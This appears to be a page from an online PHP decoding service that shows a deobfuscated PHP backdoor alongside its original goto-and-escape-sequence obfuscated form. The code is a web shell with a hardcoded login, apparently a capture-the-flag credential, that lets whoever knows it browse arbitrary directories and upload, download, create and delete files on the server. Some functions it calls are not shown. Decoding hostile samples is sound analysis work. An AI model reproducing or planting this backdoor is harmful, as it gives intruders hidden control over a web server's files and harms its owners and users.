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PHP Decode

<?php goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($..

Decoded Output download

 goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["chDir"])) { $dir = $_GET["chDir"]; } echo "<a href="?action=files&chDir=" . $dir . "&download=" . $file . ""/>[Download]</a>"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["login"]) && isset($_POST["pass"])) { if ($_POST["login"] == "NomanProdhan" && $_POST["pass"] == "BDSEC{_d3V1L_PHP_b4CKD00r_}") { $_SESSION["login"] = "logged"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) { downloadFile($_GET["chDir"] . "/" . $_GET["download"]); } goto AjwiS; hoS3m: if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) { $dir = getcwd(); if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) { $dir = $_GET["chDir"]; } $createFolderFlag = createFolder($dir, $_POST["folderName"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "/" . $name)) { return "Folder already exist."; } else { if (!is_writable($path)) { return "Don't have write permission."; } else { try { mkdir($path . "/" . $name, 511); return "Folder has been created."; } catch (Exception $e) { return "error."; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "/" . basename($file["uploadFile"]["name"]); if (!is_writable($path)) { return "Don't have write permission."; } else { if (move_uploaded_file($file["uploadFile"]["tmp_name"], $targetFile)) { return "File has been uploaded."; } else { return "Couldn't upload file."; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "/" . $name)) { echo "File already exist."; } else { if (!is_writable($path)) { echo "Don't have write permission."; } else { try { $file = fopen($path . "/" . $name, "w"); fwrite($file, "test"); fclose($file); return "File has been created."; } catch (Exception $e) { return "error."; } } } } goto iOdeB; AjwiS: if (isset($_GET["delete"]) && !empty($_GET["delete"]) && isset($_GET["chDir"])) { if (unlink($_GET["chDir"] . "/" . $_GET["delete"])) { $deleteFileFlag = "File has been deleted."; } else { $deleteFileFlag = "Couldn't delete the file."; } } goto K5ZdW; bd2b3: ?>

Did this file decode correctly?

Original Code

 goto JkAp3; ss8Yr: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["\143\150\104\151\162"])) { $dir = $_GET["\143\150\x44\x69\x72"]; } echo "\74\x61\40\150\x72\x65\x66\x3d\42\x3f\141\143\x74\151\x6f\x6e\75\146\x69\154\145\163\x26\143\150\x44\151\162\75" . $dir . "\46\144\x6f\167\156\154\157\x61\144\x3d" . $file . "\42\57\76\133\x44\x6f\167\x6e\154\157\141\144\135\74\57\141\76"; } goto BE4IO; w9cXK: function getFileMime($file) { return mime_content_type($file); } goto AtRPe; BsPcD: if (isset($_POST["\x6c\x6f\x67\151\156"]) && isset($_POST["\x70\141\x73\163"])) { if ($_POST["\x6c\157\147\x69\156"] == "\x4e\x6f\x6d\x61\156\120\x72\x6f\144\150\x61\156" && $_POST["\x70\141\163\163"] == "\x42\x44\x53\x45\x43\x7b\x5f\x64\x33\x56\x31\x4c\x5f\x50\x48\x50\x5f\x62\x34\x43\x4b\x44\x30\x30\x72\x5f\x7d") { $_SESSION["\x6c\x6f\x67\151\x6e"] = "\x6c\x6f\x67\147\145\144"; } } goto p67iP; JkAp3: ob_start(); goto BISgL; BISgL: session_start(); goto BsPcD; tQtbl: if (isset($_GET["\144\157\167\x6e\154\157\x61\x64"]) && !empty($_GET["\144\157\167\x6e\x6c\157\x61\x64"]) && isset($_GET["\x63\150\x44\151\x72"])) { downloadFile($_GET["\143\150\x44\x69\162"] . "\x2f" . $_GET["\x64\157\x77\156\154\157\141\144"]); } goto AjwiS; hoS3m: if (isset($_POST["\x66\x6f\x6c\144\x65\162\x4e\x61\x6d\x65"]) && !empty($_POST["\x66\157\154\x64\x65\162\x4e\x61\155\x65"])) { $dir = getcwd(); if (isset($_GET["\x63\150\x44\151\162"]) && !empty($_GET["\143\x68\x44\151\162"])) { $dir = $_GET["\x63\150\104\151\162"]; } $createFolderFlag = createFolder($dir, $_POST["\x66\157\154\x64\145\x72\x4e\x61\155\145"]); } goto tQxiS; iOdeB: function createFolder($path, $name) { if (is_dir($path . "\57" . $name)) { return "\106\x6f\154\144\x65\x72\x20\x61\x6c\162\145\x61\144\171\x20\x65\x78\x69\x73\x74\56"; } else { if (!is_writable($path)) { return "\x44\x6f\x6e\47\164\x20\150\x61\x76\x65\x20\x77\x72\151\x74\x65\40\160\x65\162\155\x69\163\163\x69\157\156\x2e"; } else { try { mkdir($path . "\x2f" . $name, 511); return "\106\157\154\x64\x65\x72\x20\x68\x61\163\x20\x62\145\x65\x6e\x20\143\162\x65\141\164\145\144\x2e"; } catch (Exception $e) { return "\x65\162\162\x6f\x72\56"; } } } } goto nGUMD; nGUMD: function uploadFile($path, $file) { $targetFile = $path . "\x2f" . basename($file["\165\x70\x6c\157\141\144\x46\x69\154\145"]["\156\141\x6d\145"]); if (!is_writable($path)) { return "\104\x6f\156\47\164\x20\x68\141\x76\x65\x20\x77\x72\x69\164\x65\40\x70\x65\162\x6d\x69\163\x73\151\157\156\56"; } else { if (move_uploaded_file($file["\x75\160\154\157\x61\144\106\x69\154\x65"]["\x74\155\x70\137\x6e\141\x6d\x65"], $targetFile)) { return "\x46\151\154\145\40\x68\141\163\40\x62\145\145\156\x20\165\160\154\157\141\x64\x65\144\x2e"; } else { return "\103\157\165\154\x64\156\47\164\x20\165\160\x6c\x6f\x61\x64\40\146\x69\154\x65\56"; } } } goto w9cXK; xMIJW: function createFile($path, $name) { if (file_exists($path . "\57" . $name)) { echo "\106\151\154\x65\40\141\154\x72\145\141\x64\x79\x20\145\x78\151\163\x74\56"; } else { if (!is_writable($path)) { echo "\x44\x6f\156\47\164\x20\150\141\166\145\x20\167\x72\x69\164\x65\x20\x70\145\162\x6d\151\x73\163\151\x6f\156\56"; } else { try { $file = fopen($path . "\57" . $name, "\x77"); fwrite($file, "\164\145\x73\x74"); fclose($file); return "\106\x69\154\x65\x20\x68\x61\163\40\142\145\x65\156\x20\x63\162\145\141\x74\x65\144\56"; } catch (Exception $e) { return "\x65\162\162\157\162\x2e"; } } } } goto iOdeB; AjwiS: if (isset($_GET["\144\145\x6c\145\x74\145"]) && !empty($_GET["\144\145\154\x65\164\x65"]) && isset($_GET["\143\x68\104\151\x72"])) { if (unlink($_GET["\143\x68\x44\x69\x72"] . "\x2f" . $_GET["\x64\x65\154\x65\x74\x65"])) { $deleteFileFlag = "\x46\151\x6c\x65\40\x68\141\163\x20\x62\x65\145\156\x20\x64\x65\x6c\x65\164\x65\144\x2e"; } else { $deleteFileFlag = "\x43\157\x75\154\144\156\x27\164\40\x64\145\x6c\145\164\145\x20\x74\150\x65\40\x66\151\x6c\145\x2e"; } } goto K5ZdW; bd2b3: ?>

Function Calls





MD5 1047b31f8bfef7f9acdf0a162f4adefb
Eval Count 0
Decode Time 40 ms